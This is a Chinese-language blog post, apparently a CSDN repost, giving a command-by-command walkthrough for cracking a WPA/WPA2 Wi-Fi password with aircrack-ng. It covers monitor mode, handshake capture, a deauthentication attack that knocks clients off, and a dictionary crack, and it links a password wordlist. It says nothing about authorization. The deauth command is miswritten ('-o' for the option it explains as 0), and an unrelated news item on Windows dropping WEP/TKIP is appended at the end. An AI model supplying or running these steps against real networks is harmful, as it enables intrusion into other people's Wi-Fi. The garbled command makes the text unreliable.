前言
最近整理了一些奇安信&華為&深信服大佬的課件資料+大廠面試課題,想要的可以私信自取,無償贈送給粉絲朋友~
Aircrack-ng是一個與802.11標準的無線網絡分析有關的安全軟件,主要功能有:網絡偵測,數據包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持監聽模式的無線網卡上(設備列表請參閱其官方網站)并嗅探802.11a,802.11b,802.11g的數據。該程序可運行在Linux和Windows上。Linux版本已經被移植到了Zaurus和Maemo系統平臺, 并概念驗證可移植到iPhone。
使用Kali 2021.3進行演示操作
軟件:aircrack-ng(Kali系統內置)
外置無線網卡設備: 要支持監聽,支持Linux并且免驅(我這里使用的是RT3070)
命令: sudo su
解釋: 不在管理員模式下運行可能會有權限不夠的提示
提示:執行命令之后輸入Kali的密碼,密碼是被隱藏的,直接輸入然后回車即可
命令: iwconfig/ifconfig
解釋: iwconfig查看網卡的信息、ifconfig查看新連接的設備
wlan0就是我們的無線網卡
命令: airmon-ng check kill
解釋: 殺死進程可以讓搜索更準確,不會受到影響
命令: airmon-ng
出現你的網卡信息就說明你的網卡支持監聽
命令: airmon-ng start wlan0
解釋: start開啟哪個接口 wlan0是接口的名字
再用iwconfig查看一下網卡信息,wlan0后面多了個mon,wlan0mon就說明已經開啟監聽了
命令: airodump-ng wlan0mon
解釋: BSSID:WIFI的MAC地址、PWR:信號強度(值越小信號強度強)、Data:監聽期間流量總合、CH:信道、ENC:加密算法、ESSID:WIFI名稱
提示:找到網絡之后CTRL+Z結束搜索就可以
命令: airodump-ng -c (頻道號) --bssid (MAC地址) -w (抓取的數據包的保存位置) wlan0mon
解釋:
1.c:信道
2.bssid:BSSID值
3.w:捕獲的握手包要保存到的路徑
我要破解的目標網絡是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目錄下創建了一個名為1的文件夾
輸入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
提示:所有的數值都要寫剛剛查到要破解的WIFI其中一個客戶端的值
當新的客戶端連接時,客戶端輸入密碼連接就可以抓到握手包,右上角出現WPA時就表示已經抓到了對方的握手包
命令: aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon
解釋:
0 :對客戶端表示發起攻擊,讓設備斷開連接
2:表示攻擊次數,0表示一直攻擊
a :指定無線路由器BSSID
c :指定強制斷開的設備MAC
執行命令aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon
捕捉到握手包時就停止攻擊
注意:執行主動攻擊的時候新建一個終端執行命令,原來的抓包終端不要結束
命令: aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap
解釋:
a2:WPA的握手包
b :破解的WIFI的BSSID
w :指定字典文件
* :.cap是抓取到握手包的數據包文件
最后就是等待跑字典了,下面就是破解的WIFI密碼,密碼是20041101
命令: airmon-ng stop wlan0mon
在監聽模式下,kali不能連接網絡
插入網卡,如果查看不到網卡信息,可以點開連接WIFI看一下能否搜索到附近的網絡,如果不行那就右鍵系統可移動設備-把網卡斷開再重新連接一下
插入網卡,打開網卡的監聽模式,搜索附近的WIFI,獲取握手包,最后跑字典破解握手包,這里給大家提供一個常用的密碼字典
鏈接: https://pan.baidu.com/s/1NSNniAvaLdcY0HALbBnUTw?pwd=gg7y
提取碼: gg7y
版權聲明:本文為CSDN博主「HonkerG」的原創文章
原文鏈接:https://blog.csdn.net/RFZ_322/article/details/123344248
在宣布移除“我的人脈”(My People)應用之外,Windows 10 November 2019功能更新還將移除對WEP和TKIP的WiFi網絡支持。在Windows 10 May 2019(Version 1903)功能更新中,當用戶連接到的WEP或者TKIP的WiFi網絡時候,系統會警告用戶這些協議非常容易被黑客入侵。
微軟警告稱,在未來的版本更新中,Windows10將會拒絕接入此類WiFi網絡中。微軟建議用戶使用支持AES密碼的路由器,并通過WPA2或者WPA3協議對網絡進行加密。WEP的歷史可以追溯到1997年,并且是802.11a和802.11b設備可用的唯一加密協議。 它在2001年完全破解,只需要1分鐘的數據包收集就可以暴露出加密密鑰。